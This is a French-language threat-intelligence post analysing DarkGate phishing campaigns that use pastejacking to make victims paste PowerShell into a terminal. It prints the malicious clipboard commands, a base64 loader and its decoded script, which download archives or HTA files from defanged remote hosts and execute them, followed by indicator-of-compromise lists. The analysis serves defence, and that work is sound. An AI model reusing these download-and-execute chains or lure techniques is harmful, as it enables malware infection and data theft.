Découvertes récentes par Hornetsecurity concernant le détournement de Darkgate Pastejacking

Vade

14 juin 2024

5 min de lecture

Darkgate Pastejacking - Analyse et décomposition de la chaîne dattaque (1)

Introduction

Le Threat Intelligence and Response Center de Vade (qui fait désormais partie de Hornetsecurity !) a récemment observé un certain nombre de campagnes de phishing malveillantes distribuant Darkgate à l'aide d'une technique inhabituelle appelée Pastejacking. DarkGate est une famille de logiciels malveillants sophistiqués et évolutifs, documentée pour la première fois en 2018, utilisée pour le vol d'informations et les capacités d'accès à distance et connue pour utiliser des techniques d'évasion avancées pour éviter la détection par un logiciel antivirus et d'autres mesures de sécurité.

REMARQUE : L'analyse ci-dessous contient de nombreuses URL dégradées (hxxps au lieu de https). Ceci est fait pour protéger le lecteur des clics accidentels. Il va sans dire que cette documentation est fournie à des fins de recherche et vous ne devez PAS tenter d'utiliser les URL ci-dessous de quelque manière que ce soit, sauf si vous êtes un professionnel de la sécurité qualifié. Hornetsecurity n'est pas responsable de tout dommage résultant de l'utilisation de ces informations.

La Campagne

Les 27 et 28 mai, un total de 105 640 emails de phishing ont été envoyés à partir de domaines contrôlés par 17 acteurs.

Les emails contiennent de brèves phrases conçues pour créer un sentiment d’urgence ou d’autorité, incitant le destinataire à ouvrir la pièce jointe malveillante sous prétexte de devoir réviser ou compléter un document. Ces phrases présentent des techniques de phishing classiques couramment utilisées par les auteurs de menaces.

image1

Un email de phishing prétextant une facture impayée

Un document HTML nommé clarifie_27-May\_{6 chiffres aléatoires}.html ou Scanned_05_28-2024_\_{6 chiffres aléatoires}.html est joint. Une fois ouverte, la page affiche un faux dossier Microsoft OneDrive avec un cercle de chargement, tentant de convaincre la victime qu'un PDF appelé "Reports.pdf" est en train de s'ouvrir.

image2

Un faux cercle de chargement de dossiers OneDrive

Après 2 secondes, le GIF de chargement est masqué et un message d'erreur apparaît indiquant que le document n'a pas pu être ouvert en raison d'une erreur de connexion. Selon le message, le cache DNS doit être mis à jour manuellement pour corriger cette erreur.

image3

Une erreur de connexion nécessite la mise à jour du cache DNS

En raison d'un écouteur d'événements (Event listener) sur le document, lorsqu'une partie de la page est cliquée en dehors de la zone d'erreur, une alerte s'affiche avec le message :

Échec de la connexion au service cloud "OneDrive".

Le bouton « Détails » redirige vers la documentation officielle de Microsoft expliquant comment résoudre les problèmes sur les serveurs DNS.

Lorsque vous cliquez sur le bouton « Comment réparer », un nouveau message apparaît.

image4

Un message expliquant comment corriger l'erreur DNS

Ce message invite la victime à ouvrir un terminal Windows ou une console PowerShell et à coller le contenu du presse-papiers.

Dans le backend, lorsque l'on clique sur le bouton, la fonction JavaScript JJ est appelée qui copie le contenu du titre de la page Web, préalablement décodé par la fonction atob, dans le presse-papiers grâce à la méthode désormais obsolète exeCommand("copy"). Cette technique est appelée Pastejacking.

image5

Le contenu du titre est décodé et copié dans le presse-papiers

Si une victime sans méfiance respecte les instructions, les commandes suivantes sont exécutées :

ipconfig /flushdns

$base64 = "JGppID0gImh0dHBzOi8va29zdHVtbjEuaWxhYnNlcnZlci5jb20vMS56aXAiOw0KJG5lID0gI mM6XFxkb3dubG9hZHMiOw0KTmV3LUl0ZW0gLUl0ZW1UeXBlIERpcmVjdG9yeSAtRm9yY2UgLVB hdGggJG5lOw0KSW52b2tlLVdlYlJlcXVlc3QgLVVyaSAkamkgLU91dEZpbGUgJG5lXHBsLnppc DsNCkNsZWFyLUhvc3Q7DQpFeHBhbmQtQXJjaGl2ZSAkbmVccGwuemlwIC1Gb3JjZSAtZGVzdGl uYXRpb25wYXRoICRuZTsNClJlbW92ZS1JdGVtIC1QYXRoICRuZVxwbC56aXA7DQpTdGFydC1Qc m9jZXNzICRuZVxBdXRvaXQzLmV4ZSAkbmVcc2NyaXB0LmEzeA0KW1N5c3RlbS5SZWZsZWN0aW9 uLkFzc2VtYmx5XTo6TG9hZFdpdGhQYXJ0aWFsTmFtZSgiU3lzdGVtLldpbmRvd3MuRm9ybXMiK TsNCltTeXN0ZW0uV2luZG93cy5Gb3Jtcy5NZXNzYWdlQm94XTo6U2hvdygiVGhlIG9wZXJhdGl vbiBjb21wbGV0ZWQgc3VjY2Vzc2Z1bGx5LCBwbGVhc2UgcmVsb2FkIHRoZSBwYWdlIiwgIlN5c 3RlbSIsIDAsIDY0KTsNCkNsZWFyLUhvc3Q7DQo=";

iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64Str ing($base64)));

Set-Clipboard -Value " ";

exit;

La première commande efface le cache du résolveur DNS, obligeant l'ordinateur à supprimer toutes les entrées DNS stockées et à en récupérer de nouvelles sur le serveur DNS. Cette commande ne fait rien de malveillant ; c'est seulement ici dans le but de faire croire à la victime que le faux problème DNS est en train d'être résolu.

Ensuite, une chaîne base64 est décodée et exécutée grâce à l'applet de commande iex PowerShell.

Enfin, le presse-papiers est « nettoyé » en définissant sa valeur sur quatre espaces.

Une fois décodée, la variable $base64 révèle un script PowerShell malveillant :

$ji = "hxxps://kostumn1.ilabserver.com/1.zip";
$ne = "c:\\downloads";
New-Item -ItemType Directory -Force -Path $ne;
Invoke-WebRequest -Uri $ji -OutFile $ne\pl.zip;
Clear-Host;
Expand-Archive $ne\pl.zip -Force -destinationpath $ne;
Remove-Item -Path $ne\pl.zip;
Start-Process $ne\Autoit3.exe $ne\script.a3x
[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms");
[System.Windows.Forms.MessageBox]::Show("The operation completed
successfully, please reload the page", "System", 0, 64);
Clear-Host;

Une fois exécuté, ce script télécharge un document ZIP appelé 1.zip depuis un serveur distant, l'enregistre dans le dossier c:, décompresse le contenu et supprime le ZIP précédemment téléchargé. Ensuite, pour effectuer l'infection, il exécute Autoit3.exe avec script.a3x comme argument.

Enfin, « L'opération s'est terminée avec succès, veuillez recharger la page » s'affiche dans une boîte de message.

image6

1.contenu zip

AutoIt3.exe est l'exécutable du langage de script AutoIt, conçu pour automatiser l'interface graphique Windows et les scripts généraux. Comme l'ont déjà documenté des chercheurs, DarkGate utilise couramment des scripts AutoIt dans le cadre de sa routine d'infection initiale.

image7

L'URL a une activité attribuée au malware DarkGate

Campagnes précédentes

image8

Campagnes précédentes de DarkGate en 2024

17 mai

Le 17 mai, une campagne similaire a eu lieu : environ 43 600 mails ont été envoyés depuis 11 domaines contrôlés par des acteurs.

Un thème Microsoft Office Words a été utilisé pour tromper l'utilisateur en utilisant une approche similaire.

image9

Un leurre Microsoft Word

cmd /c start /min powershell $jr = 'c:\users\public\Dp.hta';
invokewebrequest -uri hxxps://jenniferwelsh.com/header.png -outfile $jr;
startprocess $jr;Set-Clipboard -Value ' ';
exit;

La commande copiée dans le presse-papiers télécharge et exécute un script PowerShell depuis hxxps://jenniferwelsh.com/header.png. Le script est enregistré dans un fichier HTA situé dans c :

image10

HTA malveillant téléchargé depuis un serveur distant

Ce script légèrement obscurci télécharge sa prochaine étape depuis hxxps://mylittlecabbage.net/qhsddxna, un script PowerShell qui télécharge un ZIP depuis hxxp://mylittlecabbage.net/xcdttafq contenant l'exécutable AutoIt3 avec son script.a3x. Le script contient également une chaîne espagnole qui peut être traduite par « ouvrir la calculatrice ».

Le 8 mai

Le 8 mai, environ 57 500 emails de phishing ont été envoyés avec un PDF en pièce jointe invitant la victime à télécharger un faux programme d'installation Java pour accéder à un document.

image11

PDF malveillant incitant la victime à télécharger un faux installateur Java

Le 2 mai

Le 2 mai, une autre campagne utilisant le même thème Microsoft Word a eu lieu : environ 43 600 emails de phishing ont été envoyés.

Victimologie

Basées sur les domaines du destinataire, ces campagnes semblent cibler un large éventail de secteurs et de zones géographiques, reflétant une approche large et opportuniste visant le gain financier. Lors des campagnes des 27 et 28 mai, d'après nos observations, l'Europe occidentale (France, Allemagne et Espagne) et l'Amérique du Nord (États-Unis et Canada) sont au centre des préoccupations. Enfin, cette campagne de phishing a ciblé 75 % de ses efforts vers les secteurs B2B et 25 % vers les secteurs B2C.

Conclusion

Cette recherche met en évidence la façon dont le malware DarkGate continue d’évoluer et reste actif dans le paysage de la cybersécurité. Malgré les efforts continus pour combattre et atténuer son impact, DarkGate a fait preuve de résilience et d'adaptabilité, en maintenant sa présence dans divers vecteurs d'attaque (fausses mises à jour de navigateur ou messages Teams) et en tirant parti de techniques créatives pour atteindre ses objectifs.

L’un des moyens les plus efficaces de se défendre contre de telles menaces consiste à bloquer les emails de phishing, car ceux-ci constituent le principal mécanisme de transmission de nombreux types de logiciels malveillants. Hornetsecurity continuera à surveiller cette menace pour s'assurer que nos clients restent protégés contre ces techniques.

Indicateurs de compromission

Domaines de l'expéditeur du 27 et 28 mai:

  • megabrightsigns[.]com
  • languangjob[.]com
  • top10nursingschools[.]com
  • rumsfeldfinance[.]com
  • quantummerchandise[.]com
  • sonicwarrior[.]org
  • scsho[.]com
  • euthanizerent[.]com
  • xpacgdh[.]com
  • welcomenymegoo[.]com
  • shawlasereye[.]com
  • bloggersua[.]com
  • ruthlesslyfests[.]com
  • shirleymallin[.]com
  • nightstarmusic[.]com
  • rumsfeldsecurity[.]com
  • nightstarmusic[.]com

 

Domaines de l'expéditeur du 17 mai :

  • ethspark[.]com
  • exportersnet[.]com
  • languangjob[.]com
  • yerembe[.]com
  • eiqtechnology[.]com
  • wthome[.]cn
  • gwempresarial[.]com
  • udportuariosdisarp[.]com
  • automobile-locksmith[.]com
  • shanteauconsulting[.]com
  • udportuariosdisarp[.]com

Noms d'utilisateur du 27-28 mai

  • webmaster
  • fastsupport
  • accounting
  • bill
  • contact
  • jessie
  • limited
  • noreply
  • cls
  • gpk
  • support
  • company
  • anna
  • eva
  • information
  • info
  • service
  • alan
  • admin
  • lexisnexis
  • marketing
  • energy
  • springenergy
  • manager
  • global
  • solutions
  • director
  • solutions

Noms d'utilisateur du 17 mai

  • admin
  • support
  • no-reply
  • auto-reply
  • smacleod
  • administrator
  • office
  • usr
  • samer
  • system
  • transfer
  • user
  • office2
  • service
  • info
  • dave
  • transfer

Fichiers SHA-256:

5316fc2cb4c54ba46a42e77e9ee387d158f0f3dc7456a0c549f9718b081c6c26
1.zip

237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
AutoIt3.exe

493fb733897f4c3d7adf01d663e711e2e47240bfdf5b99abd230aa809f43a8cf
script.a3x

6799222df869a6440bc3372604c36f25efc784292d74901fb2b62695f00acd67
header.png

4b61c21167fbe9a6573fdb6e68889fd4db180e7a8d41b9ee049ca6d54341c8f9
qhsddxna

9a8b0ebe7b18da6e638fdc9f7e1353c56a561419b12932aff6b0a42a7fe6ac12
xcdttafq

0116d3f7e5ecafaf572141a6eaf3bffa80ff04519872be77f07f4b284272db5d
script.a3x

URL:

  • hxxps://kostumn1.ilabserver.com/1.zip
  • hxxps://jenniferwelsh.com/header.png
  • hxxps://mylittlecabbage.net/qhsddxna
  • hxxp://mylittlecabbage.net/xcdttafq
  • hxxps://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta
  • hxxps://dogmupdate.com/rdyjyany
  • hxxps://adztrk.com/ouh5d